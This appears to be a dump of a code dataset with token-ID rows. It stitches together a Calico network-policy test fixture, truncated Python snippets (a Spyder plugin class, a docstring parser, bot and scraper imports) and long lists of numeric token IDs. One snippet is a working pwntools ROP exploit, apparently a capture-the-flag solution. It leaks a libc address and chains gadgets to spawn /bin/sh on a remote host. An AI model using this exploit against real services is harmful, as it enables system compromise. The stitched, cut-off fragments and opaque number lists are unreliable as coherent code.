'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Her.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_name_too_long'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {
'calico/k8s_ns': 'default',
'type': 'type-endFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75'},
'spec': {'expectedIPs': ['fd00:1::321'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['hep_mixed_ip'] = {
'apiVersion': 'v1',
'kind': 'hostEndpoint',
'metadata': {'labels': {'type': 'production'},
'name': 'eth0',
'node': 'myotherhost'},
'spec': {'expectedIPs': ['192.168.0.1',
'192.168.0.2',
'fd00:ca:fe:1d:52:bb:e9:80'],
'interfaceName': 'eth0',
'profiles': ['profile1', 'profile2']}
}
data['ippool_v4_small'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '10.1.0.0/26'},
'spec': {'disabled': False,
'ipip': {'enabled': True, 'mode': 'cross-subnet'},
'nat-outgoing': True}
}
data['ippool_v4_large'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '10.0.0.0/8'},
'spec': {'disabled': False,
'ipip': {'enabled': True, 'mode': 'always'},
'nat-outgoing': True}
}
data['ippool_mixed'] = {
'apiVersion': 'v1',
'kind': 'ipPool',
'metadata': {'cidr': '2006::/64'},
'spec': {'disabled': False,
'ipip': {'enabled': False, 'mode': 'always'},
'nat-outgoing': False}
}
data['node_long_name'] = {
'apiVersion': 'v1',
'kind': 'node',
'metadata': {
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-NodeName_in_order_to.break.upgrade-code201600'},
'spec': {'bgp': {'asNumber': '7.20',
'ipv4Address': '10.244.0.1/24',
'ipv6Address': '2001:db8:85a3::8a2e:370:7334/120'}}
}
data['node_tame'] = {
'apiVersion': 'v1',
'kind': 'node',
'metadata': {'name': 'node-hostname'},
'spec': {'bgp': {'asNumber': 64512,
'ipv4Address': '10.244.0.1/24',
'ipv6Address': '2001:db8:85a3::8a2e:370:7334/120'}}
}
data['policy_tame'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-tcp-6379'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'protocol': 'tcp',
'source': {'selector': "role == 'frontend'"}}],
'selector': "role == 'database'",
'types': ['ingress', 'egress']}
}
data['policy_long_name'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-PolicyName_in_order_to.break.upgrade-code2016'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'protocol': 'tcp',
'source': {'nets': ['192.168.0.1/32']}}],
'selector': "role == 'database'",
'types': ['ingress', 'egress']}
}
data['profile_tame'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {'profile': 'profile1'}, 'name': 'profile1'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'deny',
'source': {'nets': ['10.0.20.0/24']}},
{'action': 'allow',
'source': {'selector': "profile == 'profile1'"}}]}
}
data['profile_long_labels'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {
'8roper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/Key_name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/key_Name.which/is-also_very.long...1234567890//proper/evil-02/key_name.which/is-also_very.long...1234567890//proper/evil-02/9': 'frontendFrontEnd.0123456789-_-23wdffrontendFrontEnd.0124679-_-0'},
'name': '-Mary_had-A-Little___Lamb--Whose---Fleece-Was-White.As.Snow...She-Also-Had_an-Evil-ProfileName_in_order_to.break.upgradeprofile1'},
'spec': {'egress': [{'action': 'allow'}],
'ingress': [{'action': 'deny',
'source': {'nets': ['10.0.20.0/24',
'192.168.000.000/32',
'192.168.001.255/32',
'192.168.002.254/32',
'192.168.003.253/32',
'192.168.004.252/32',
'192.168.005.251/32',
'192.168.006.250/32',
'192.168.007.249/32',
'192.168.008.248/32',
'192.168.009.247/32',
'192.168.010.246/32',
'192.168.011.245/32',
'192.168.012.244/32',
'192.168.013.243/32',
'192.168.014.242/32',
'192.168.015.241/32',
'192.168.016.240/32',
'192.168.017.239/32',
'192.168.018.238/32',
'192.168.100.000/32',
'192.168.101.255/32',
'192.168.102.254/32',
'192.168.103.253/32',
'192.168.104.252/32',
'192.168.105.251/32',
'192.168.106.250/32',
'192.168.107.249/32',
'192.168.108.248/32',
'192.168.109.247/32',
'192.168.110.246/32',
'192.168.111.245/32',
'192.168.112.244/32',
'192.168.113.243/32',
'192.168.114.242/32',
'192.168.115.241/32',
'192.168.116.240/32',
'192.168.117.239/32',
'192.168.118.238/32',
'192.168.200.000/32',
'192.168.201.255/32',
'192.168.202.254/32',
'192.168.203.253/32',
'192.168.204.252/32',
'192.168.205.251/32',
'192.168.206.250/32',
'192.168.207.249/32',
'192.168.208.248/32',
'192.168.209.247/32',
'192.168.210.246/32',
'192.168.211.245/32',
'192.168.212.244/32',
'192.168.213.243/32',
'192.168.214.242/32',
'192.168.215.241/32',
'192.168.216.240/32',
'192.168.217.239/32',
'192.168.218.238/32',
'47.0.0.0/8']}},
{'action': 'allow',
'source': {'selector': "profile == 'profile1'"}}]}
}
data['policy_big'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'annotations': {'aname': 'avalue'}, 'name': 'allow-tcp-6379'},
'spec': {'egress': [{'action': 'allow',
'icmp': {'code': 25, 'type': 25},
'protocol': 'icmp'}],
'ingress': [{'action': 'allow',
'destination': {'ports': [6379]},
'notProtocol': 'udplite',
'protocol': 'tcp',
'source': {
'notSelector': "role != 'something' && thing in {'one', 'two'}",
'selector': "role == 'frontend' && thing not in {'three', 'four'}"}},
{'action': 'allow',
'protocol': 'tcp',
'source': {
'notSelector': "role != 'something' && thing in {'one', 'two'}"}},
{'action': 'deny',
'destination': {'notPorts': [80],
'ports': [22, 443]},
'protocol': 'tcp'},
{'action': 'allow',
'source': {'nets': ['172.18.18.200/32',
'172.18.19.0/24']}},
{'action': 'allow',
'source': {'net': '172.18.18.100/32'}},
{'action': 'deny',
'source': {'notNet': '172.19.19.100/32'}},
{'action': 'deny',
'source': {'notNets': ['172.18.0.0/16']}}],
'order': 1234,
'selector': "role == 'database' && !has(demo)",
'types': ['ingress', 'egress']}
}
data['profile_big'] = {
'apiVersion': 'v1',
'kind': 'profile',
'metadata': {'labels': {'profile': 'profile1'},
'name': 'profile1',
'tags': ['atag', 'btag']},
'spec': {'egress': [{'action': 'allow',
'destination': {'notSelector': "profile == 'system'"}},
{'action': 'allow',
'source': {'selector': "something in {'a', 'b'}"}},
{'action': 'allow',
'destination': {'selector': "something not in {'a', 'b'}"}}],
'ingress': [{'action': 'deny',
'destination': {'notPorts': [22, 443, 21, 8080],
'tag': 'atag'},
'protocol': 'udp',
'source': {'net': '172.20.0.0/16',
'notNet': '172.20.5.0/24',
'notTag': 'dtag',
'tag': 'ctag'}},
{'action': 'deny',
'destination': {'notPorts': [22, 443, 21, 8080],
'tag': 'atag'},
'protocol': 'tcp',
'source': {'nets': ['10.0.21.128/25'],
'notNets': ['10.0.20.0/24']}},
{'action': 'deny',
'protocol': 'tcp',
'source': {'notNets': ['10.0.21.128/25']}},
{'action': 'allow',
'protocol': 'tcp',
'source': {'ports': [1234, 4567, 489],
'selector': "profile != 'profile1' && has(role)"}}]}
}
data['wep_lots_ips'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default.frontend-5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.000.000/32',
'192.168.001.255/32',
'192.168.002.254/32',
'192.168.003.253/32',
'192.168.004.252/32',
'192.168.005.251/32',
'192.168.006.250/32',
'192.168.007.249/32',
'192.168.008.248/32',
'192.168.009.247/32',
'192.168.010.246/32',
'192.168.011.245/32',
'192.168.012.244/32',
'192.168.013.243/32',
'192.168.014.242/32',
'192.168.015.241/32',
'192.168.016.240/32',
'192.168.017.239/32',
'192.168.018.238/32',
'192.168.100.000/32',
'192.168.101.255/32',
'192.168.102.254/32',
'192.168.103.253/32',
'192.168.104.252/32',
'192.168.105.251/32',
'192.168.106.250/32',
'192.168.107.249/32',
'192.168.108.248/32',
'192.168.109.247/32',
'192.168.110.246/32',
'192.168.111.245/32',
'192.168.112.244/32',
'192.168.113.243/32',
'192.168.114.242/32',
'192.168.115.241/32',
'192.168.116.240/32',
'192.168.117.239/32',
'192.168.118.238/32',
'192.168.200.000/32',
'192.168.201.255/32',
'192.168.202.254/32',
'192.168.203.253/32',
'192.168.204.252/32',
'192.168.205.251/32',
'192.168.206.250/32',
'192.168.207.249/32',
'192.168.208.248/32',
'192.168.209.247/32',
'192.168.210.246/32',
'192.168.211.245/32',
'192.168.212.244/32',
'192.168.213.243/32',
'192.168.214.242/32',
'192.168.215.241/32',
'192.168.216.240/32',
'192.168.217.239/32',
'192.168.218.238/32'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['wep_similar_name'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default/frontend-5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.0.0/32',
'192.168.1.255/32',
'192.168.2.254/32',
'192.168.3.253/32',
'192.168.4.252/32',
'192.168.5.251/32',
'192.168.6.250/32',
'192.168.7.249/32',
'192.168.8.248/32',
'192.168.9.247/32',
'192.168.10.246/32',
'192.168.11.245/32',
'192.168.12.244/32',
'192.168.13.243/32',
'192.168.14.242/32',
'192.168.15.241/32',
'192.168.16.240/32',
'192.168.17.239/32',
'192.168.18.238/32'],
'mac': 'fe:ed:ca:fe:00:00',
'profiles': ['profile1']}
}
data['wep_bad_workload_id'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {
'calico/k8s_ns': 'default'},
'name': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_AlsoAVeryLongInterfaceNameTryingToCatchOutUpgradeCode75',
'node': '.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My.Spout.Im_Also.A.Very.LongNodeNameTryingTo-CatchOut_UpgradeCode75',
'orchestrator': 'k8s',
'workload': 'default.-_.123Im_a_Little.Teapot-Short_And-Stout.Heres-My-Handle_Heres_My_AlsoAVeryLongWorkload-NameTryingToCatchOutUpgradeCode5'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['192.168.255.255/32', 'fd::1:40'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['wep_similar_name_2'] = {
'apiVersion': 'v1',
'kind': 'workloadEndpoint',
'metadata': {'labels': {'app': 'frontend', 'calico/k8s_ns': 'default'},
'name': 'eth0',
'node': 'rack1-host1',
'orchestrator': 'k8s',
'workload': 'default.frontend.5gs43'},
'spec': {'interfaceName': 'cali0ef24ba',
'ipNetworks': ['fd00:ca:fe:1d:52:bb:e9:80'],
'mac': 'ca:fe:1d:52:bb:e9',
'profiles': ['profile1']}
}
data['do_not_track'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-tcp-555-donottrack'},
'spec': {'doNotTrack': True,
'ingress': [{'action': 'allow',
'destination': {'ports': [555]},
'protocol': 'tcp',
'source': {'selector': "role == 'cache'"}}],
'order': 1230,
'selector': "role == 'database'",
'types': ['ingress']}
}
data['prednat_policy'] = {
'apiVersion': 'v1',
'kind': 'policy',
'metadata': {'name': 'allow-cluster-internal-ingress'},
'spec': {'ingress': [{'action': 'allow',
'source': {'nets': ['10.240.0.0/16',
'192.168.0.0/16']}}],
'order': 10,
'preDNAT': True,
'selector': 'has(host-endpoint)'}
}
| [
2,
15069,
357,
66,
8,
2177,
17030,
64,
11,
3457,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
1... | 1.601773 | 15,225 |
from django.shortcuts import render
from django.template import RequestContext
from ..conf import settings
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
42625,
14208,
13,
28243,
1330,
19390,
21947,
198,
198,
6738,
11485,
10414,
1330,
6460,
628,
628
] | 4.269231 | 26 |
#This NMT Decoder will return two things: (1) The second decoder hidden state (2) The first decoder hidden state
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import math
import random
import numpy as np
#Implement of cGRU from nematus language toolkit paper address is: | [
2,
1212,
399,
13752,
34580,
481,
1441,
734,
1243,
25,
357,
16,
8,
383,
1218,
875,
12342,
7104,
1181,
357,
17,
8,
383,
717,
875,
12342,
7104,
1181,
198,
198,
11748,
28034,
198,
6738,
28034,
13,
2306,
519,
6335,
1330,
35748,
198,
1174... | 3.666667 | 90 |
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Base plugin class
"""
# Third party imports
import qdarkstyle
from qtpy.QtCore import Qt, Slot
from qtpy.QtGui import QKeySequence
from qtpy.QtWidgets import QDockWidget, QMainWindow, QShortcut
# Local imports
from spyder.config.base import _
from spyder.config.gui import is_dark_interface, get_font
from spyder.config.main import CONF
from spyder.py3compat import is_text_string
from spyder.utils import icon_manager as ima
from spyder.utils.qthelpers import create_action
from spyder.widgets.dock import SpyderDockWidget
class PluginWindow(QMainWindow):
"""MainWindow subclass that contains a Spyder Plugin."""
def closeEvent(self, event):
"""Reimplement Qt method."""
self.plugin.dockwidget.setWidget(self.plugin)
self.plugin.dockwidget.setVisible(True)
self.plugin.switch_to_plugin()
QMainWindow.closeEvent(self, event)
self.plugin.undocked_window = None
class BasePluginMixin(object):
"""Basic functionality for Spyder plugin widgets."""
ALLOWED_AREAS = Qt.AllDockWidgetAreas
LOCATION = Qt.LeftDockWidgetArea
FEATURES = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetMovable
def initialize_plugin_in_mainwindow_layout(self):
"""
If this is the first time the plugin is shown, perform actions to
initialize plugin position in Spyder's window layout.
Use on_first_registration to define the actions to be run
by your plugin
"""
if self.get_option('first_time', True):
try:
self.on_first_registration()
except NotImplementedError:
return
self.set_option('first_time', False)
def update_margins(self):
"""Update plugin margins"""
layout = self.layout()
if self.default_margins is None:
self.default_margins = layout.getContentsMargins()
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
layout.setContentsMargins(*[margin]*4)
else:
layout.setContentsMargins(*self.default_margins)
def update_plugin_title(self):
"""Update plugin title, i.e. dockwidget or window title"""
if self.dockwidget is not None:
win = self.dockwidget
elif self.undocked_window is not None:
win = self.undocked_window
else:
return
win.setWindowTitle(self.get_plugin_title())
def create_dockwidget(self):
"""Add to parent QMainWindow as a dock widget"""
# Creating dock widget
dock = SpyderDockWidget(self.get_plugin_title(), self.main)
# Set properties
dock.setObjectName(self.__class__.__name__+"_dw")
dock.setAllowedAreas(self.ALLOWED_AREAS)
dock.setFeatures(self.FEATURES)
dock.setWidget(self)
self.update_margins()
dock.visibilityChanged.connect(self.visibility_changed)
dock.topLevelChanged.connect(self.on_top_level_changed)
dock.sig_plugin_closed.connect(self.plugin_closed)
self.dockwidget = dock
if self.shortcut is not None:
sc = QShortcut(QKeySequence(self.shortcut), self.main,
self.switch_to_plugin)
self.register_shortcut(sc, "_", "Switch to %s" % self.CONF_SECTION)
return (dock, self.LOCATION)
def create_configwidget(self, parent):
"""Create configuration dialog box page widget"""
if self.CONFIGWIDGET_CLASS is not None:
configwidget = self.CONFIGWIDGET_CLASS(self, parent)
configwidget.initialize()
return configwidget
def switch_to_plugin(self):
"""Switch to plugin."""
if (self.main.last_plugin is not None and
self.main.last_plugin.ismaximized and
self.main.last_plugin is not self):
self.main.maximize_dockwidget()
if not self.toggle_view_action.isChecked():
self.toggle_view_action.setChecked(True)
self.visibility_changed(True)
@Slot()
def plugin_closed(self):
"""DockWidget was closed"""
self.toggle_view_action.setChecked(False)
def get_plugin_font(self, rich_text=False):
"""
Return plugin font option.
All plugins in Spyder use a global font. This is a convenience method
in case some plugins will have a delta size based on the default size.
"""
if rich_text:
option = 'rich_font'
font_size_delta = self.RICH_FONT_SIZE_DELTA
else:
option = 'font'
font_size_delta = self.FONT_SIZE_DELTA
return get_font(option=option, font_size_delta=font_size_delta)
def set_plugin_font(self):
"""
Set plugin font option.
Note: All plugins in Spyder use a global font. To define a different
size, the plugin must define a 'FONT_SIZE_DELTA' class variable.
"""
raise Exception("Plugins font is based on the general settings, "
"and cannot be set directly on the plugin."
"This method is deprecated.")
def show_message(self, message, timeout=0):
"""Show message in main window's status bar"""
self.main.statusBar().showMessage(message, timeout)
def create_toggle_view_action(self):
"""Associate a toggle view action with each plugin"""
title = self.get_plugin_title()
if self.CONF_SECTION == 'editor':
title = _('Editor')
if self.shortcut is not None:
action = create_action(self, title,
toggled=lambda checked: self.toggle_view(checked),
shortcut=QKeySequence(self.shortcut),
context=Qt.WidgetShortcut)
else:
action = create_action(self, title, toggled=lambda checked:
self.toggle_view(checked))
self.toggle_view_action = action
def toggle_view(self, checked):
"""Toggle view"""
if not self.dockwidget:
return
if checked:
self.dockwidget.show()
self.dockwidget.raise_()
else:
self.dockwidget.hide()
@Slot()
def close_window(self):
"""Close QMainWindow instance that contains this plugin."""
if self.undocked_window is not None:
self.undocked_window.close()
self.undocked_window = None
# Oddly, these actions can appear disabled after the Dock
# action is pressed
self.undock_action.setDisabled(False)
self.close_plugin_action.setDisabled(False)
@Slot()
def create_window(self):
"""Create a QMainWindow instance containing this plugin."""
self.undocked_window = window = PluginWindow(self)
window.setAttribute(Qt.WA_DeleteOnClose)
icon = self.get_plugin_icon()
if is_text_string(icon):
icon = self.get_icon(icon)
window.setWindowIcon(icon)
window.setWindowTitle(self.get_plugin_title())
window.setCentralWidget(self)
window.resize(self.size())
self.refresh_plugin()
self.dockwidget.setFloating(False)
self.dockwidget.setVisible(False)
window.show()
@Slot(bool)
def on_top_level_changed(self, top_level):
"""Actions to perform when a plugin is undocked to be moved."""
if top_level:
self.undock_action.setDisabled(True)
else:
self.undock_action.setDisabled(False)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
198,
2,
15069,
10673,
23688,
1082,
4935,
25767,
669,
198,
2,
49962,
739,
262,
2846,
286,
262,
17168,
13789,
198,
2,
357,
3826,
13997,
1082,
14,
834,
15003,
834,
13,... | 2.300294 | 3,400 |
from selenium import webdriver # necessary for web dynamic pages
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.support.ui import WebDriverWait
from app.bet_models.betting_data import BettingData
| [
6738,
384,
11925,
1505,
1330,
3992,
26230,
220,
1303,
3306,
329,
3992,
8925,
5468,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
1525,
1330,
2750,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
1330,
2938,
62,... | 3.594937 | 79 |
from deap import benchmarks
from math import sin
| [
6738,
390,
499,
1330,
31747,
198,
6738,
10688,
1330,
7813,
628,
198
] | 4.25 | 12 |
import numpy as np
from autoarray.structures.arrays.two_d import array_2d
from autoarray.structures.grids.two_d import grid_2d
from autoarray.structures.grids.two_d import grid_2d_irregular
from skimage import measure
from functools import wraps
| [
11748,
299,
32152,
355,
45941,
201,
198,
6738,
8295,
18747,
13,
7249,
942,
13,
3258,
592,
13,
11545,
62,
67,
1330,
7177,
62,
17,
67,
201,
198,
6738,
8295,
18747,
13,
7249,
942,
13,
2164,
2340,
13,
11545,
62,
67,
1330,
10706,
62,
1... | 2.835165 | 91 |
import vacefron, randfacts, asyncpraw, datetime, json, requests
import disnake
from jokeapi import Jokes
from .utils import thecolor
from core.utils.HIDDEN import *
reddit = asyncpraw.Reddit(
client_id=client_id,
client_secret=client_secret,
username=username,
password=password,
user_agent=user_agent,
)
vace_api = vacefron.Client()
| [
11748,
410,
558,
69,
1313,
11,
43720,
37473,
11,
355,
2047,
13155,
1831,
11,
4818,
8079,
11,
33918,
11,
7007,
201,
198,
11748,
595,
77,
539,
201,
198,
6738,
9707,
15042,
1330,
449,
3369,
201,
198,
201,
198,
6738,
764,
26791,
1330,
2... | 2.477124 | 153 |
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./arm')
if args.REMOTE:
p = remote('172.104.14.64', 54732)
libc = ELF('./libc-2.23.so')
p.recvuntil('printf at ')
else:
if os.uname().machine == context.arch:
p = process(binary.path)
libc = binary.libc
else:
if args.GDB:
p = process(('stdbuf -i0 -o0 -e0 qemu-'+context.arch+' -g 9000 -L /usr/'+context.arch+'-linux-gnu '+binary.path).split())
else:
p = process(('stdbuf -i0 -o0 -e0 qemu-'+context.arch+' -L /usr/'+context.arch+'-linux-gnu '+binary.path).split())
libc = ELF('/usr/'+context.arch+'-linux-gnu/lib/libc.so.6')
p.recvuntil('print at ')
_ = p.recvline().strip().decode()
printf = int(_,16)
libc.address = printf - libc.sym.printf
log.info('libc.address: ' + hex(libc.address))
payload = b''
payload += 128 * b'A'
payload += 8 * b'B'
payload += p64(libc.search(asm('ldp x19, x20, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;')).__next__())
payload += (8 * 3) * b'C'
payload += p64(libc.search(asm('mov x0, x19; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x20; ret;')).__next__())
payload += p64(libc.search(b"/bin/sh").__next__())
payload += (8 * 2) * b'D'
payload += p64(libc.sym.system)
p.sendlineafter('> ',payload)
for i in range(3): p.recvline()
p.interactive()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
6738,
279,
675,
1330,
1635,
198,
198,
39491,
796,
4732,
13,
39491,
796,
17852,
37,
7,
4458,
14,
1670,
11537,
198,
198,
361,
26498,
13,
40726,
23051,
25,
198,
197,
79,
796,
... | 2.14958 | 595 |
# -* coding: utf-8 *-
"""
:py:mod:`pynspector.doc_parser`
-------------------------------
Here you will find parsers for docstrings, this will help you to retrieve all
arguments, types and descriptions defined on docstrings.
You can use different parsers such as:
- sphinx_doc_parser
"""
# System imports
import re
import sys
# Third-party imports
# Local imports
__all__ = ['sphinx_doc_parser']
PARAM_OR_RETURNS_REGEX = re.compile(r":(?:param|returns|return)")
RETURNS_REGEX = re.compile(
r":(returns|return): (?P<doc>.*)(?:(?=:param)|(?=:raises)|(?=:rtype)|(?=:type)|\Z)", re.S
)
TYPE_REGEX = re.compile(
r":type (?P<name>[\*\w]+): (?P<type>.*?)(?:(?=:param)|"
r"(?=:return)|(?=:returns)|(?=:raises)|(?=:rtype)|\Z)", re.S
)
PARAM_REGEX = re.compile(
r":param (?P<type>.*?)(?P<name>[\*\w]+): (?P<doc>.*?)(?:(?=:param)|"
r"(?=:return)|(?=:returns)|(?=:raises)|(?=:rtype)|(?=:type)|\Z)", re.S
)
def _trim(docstring):
"""trim function from PEP-257
:param str docstring: Docstring in string format
:return: Docstring parsed with trim.
:rtype: str
"""
# Convert tabs to spaces (following the normal Python rules)
# and split into a list of lines:
lines = docstring.expandtabs().splitlines()
# Determine minimum indentation (first line doesn't count):
indent = sys.maxsize
for line in lines[1:]:
stripped = line.lstrip()
if stripped:
indent = min(indent, len(line) - len(stripped))
# Remove indentation (first line is special):
trimmed = [lines[0].strip()]
if indent < sys.maxsize:
for line in lines[1:]:
trimmed.append(line[indent:].rstrip())
# Strip off trailing and leading blank lines:
while trimmed and not trimmed[-1]:
trimmed.pop()
while trimmed and not trimmed[0]:
trimmed.pop(0)
# Current code/unittests expects a line return at
# end of multiline docstrings
# workaround expected behavior from unittests
if "\n" in docstring:
trimmed.append("")
# Return a single string:
return "\n".join(trimmed)
def _reindent(string):
"""Reindent string"""
return "\n".join(l.strip() for l in string.strip().split("\n"))
def sphinx_doc_parser(docstring):
"""Parse docstring and return short, long and arguments for this function
This parser should work as sphinx does by default. It should be able to parse
docstrings following next format:
```
Title of the docstring
Long description goes here, with
multiline support.
:param str argument_one: Argument one description
:param argument_two: Argument two description
:type argument_two: str
:return: What the function returns
```
- The short description or title is mandatory (at least for now).
- The long description is optional, it will report "" if there's no long description available.
- The param type is not mandatory, if there's no type for a param, it will report it as None.
- The return statement could be also "returns", both works fine.
:param str docstring: Docstring in string format
:returns: Tuple with short_description, long_description, params, returns
:rtype: tuple
"""
short_description = long_description = returns = ""
params = {}
if docstring:
docstring = _trim(docstring)
lines = docstring.split("\n", 1)
short_description = lines[0]
if len(lines) > 1:
long_description = lines[1].strip()
params_returns_desc = None
match = PARAM_OR_RETURNS_REGEX.search(long_description)
if match:
long_desc_end = match.start()
params_returns_desc = long_description[long_desc_end:].strip()
long_description = long_description[:long_desc_end].rstrip()
if params_returns_desc:
params = {}
for type_, name, doc in PARAM_REGEX.findall(params_returns_desc):
params[name] = {'doc': ' '.join(_trim(doc).split('\n')),
'type': type_.strip() if type_ else None}
match = RETURNS_REGEX.search(params_returns_desc)
if match:
returns = _reindent(match.group("doc"))
for name, type_ in TYPE_REGEX.findall(params_returns_desc):
type_ = type_.strip()
if name in params:
params[name].update({'type': type_})
else:
params[name] = {'doc':'', 'type': type_}
return short_description, long_description, params, returns
| [
2,
532,
9,
19617,
25,
3384,
69,
12,
23,
1635,
12,
198,
37811,
198,
25,
9078,
25,
4666,
25,
63,
79,
2047,
4443,
273,
13,
15390,
62,
48610,
63,
198,
1783,
24305,
198,
4342,
345,
481,
1064,
13544,
364,
329,
2205,
37336,
11,
428,
48... | 2.409278 | 1,940 |
import pymongo.errors
# Retry decorator with exponential backoff
def retry(tries=5, delay=0.1, backoff=2):
"""Retries a function or method until it returns True.
delay sets the initial delay in seconds, and backoff sets the factor by which
the delay should lengthen after each failure. backoff must be greater than 1,
or else it isn't really a backoff. tries must be at least 0, and delay
greater than 0.
Reference:
http://wiki.python.org/moin/PythonDecoratorLibrary#Retry"""
if backoff <= 1:
raise ValueError("backoff must be greater than 1")
tries = math.floor(tries)
if tries < 0:
raise ValueError("tries must be 0 or greater")
if delay <= 0:
raise ValueError("delay must be greater than 0")
return deco_retry # @retry(arg[, ...]) -> true decorator
| [
11748,
279,
4948,
25162,
13,
48277,
198,
198,
2,
4990,
563,
11705,
1352,
351,
39682,
736,
2364,
198,
4299,
1005,
563,
7,
83,
1678,
28,
20,
11,
5711,
28,
15,
13,
16,
11,
736,
2364,
28,
17,
2599,
198,
220,
220,
220,
37227,
9781,
1... | 2.905923 | 287 |
from lib.Message import Message
from lib.User import User
| [
6738,
9195,
13,
12837,
1330,
16000,
198,
6738,
9195,
13,
12982,
1330,
11787,
628
] | 4.214286 | 14 |
from crafting.photography_enums import PhotoStyleType
from interactions import ParticipantTypeSingle, ParticipantType
from interactions.utils.interaction_elements import XevtTriggeredElement
from sims4.tuning.tunable import TunableEnumEntry
import sims4
logger = sims4.log.Logger('Photography', default_owner='rrodgers')
| [
6738,
21671,
13,
38611,
4867,
62,
268,
5700,
1330,
5555,
21466,
6030,
198,
6738,
12213,
1330,
29880,
6030,
28008,
11,
29880,
6030,
198,
6738,
12213,
13,
26791,
13,
3849,
2673,
62,
68,
3639,
1330,
1395,
1990,
83,
2898,
328,
10446,
20180,... | 3.647727 | 88 |
# Copyright (c) 2021, www.nestorbird.com and contributors
# For license information, please see license.txt
# import frappe
from frappe.model.document import Document
| [
2,
15069,
357,
66,
8,
33448,
11,
7324,
13,
77,
395,
273,
16944,
13,
785,
290,
20420,
198,
2,
1114,
5964,
1321,
11,
3387,
766,
5964,
13,
14116,
198,
198,
2,
1330,
5306,
27768,
198,
6738,
5306,
27768,
13,
19849,
13,
22897,
1330,
168... | 3.733333 | 45 |
"""Unit tests for network.py."""
# standard library
import unittest
from unittest.mock import MagicMock, sentinel, patch
from delphi.epidata.acquisition.covid_hosp.common.network import Network
import pandas as pd
# py3tester coverage target
__test_target__ = 'delphi.epidata.acquisition.covid_hosp.common.network'
| [
37811,
26453,
5254,
329,
3127,
13,
9078,
526,
15931,
198,
198,
2,
3210,
5888,
198,
11748,
555,
715,
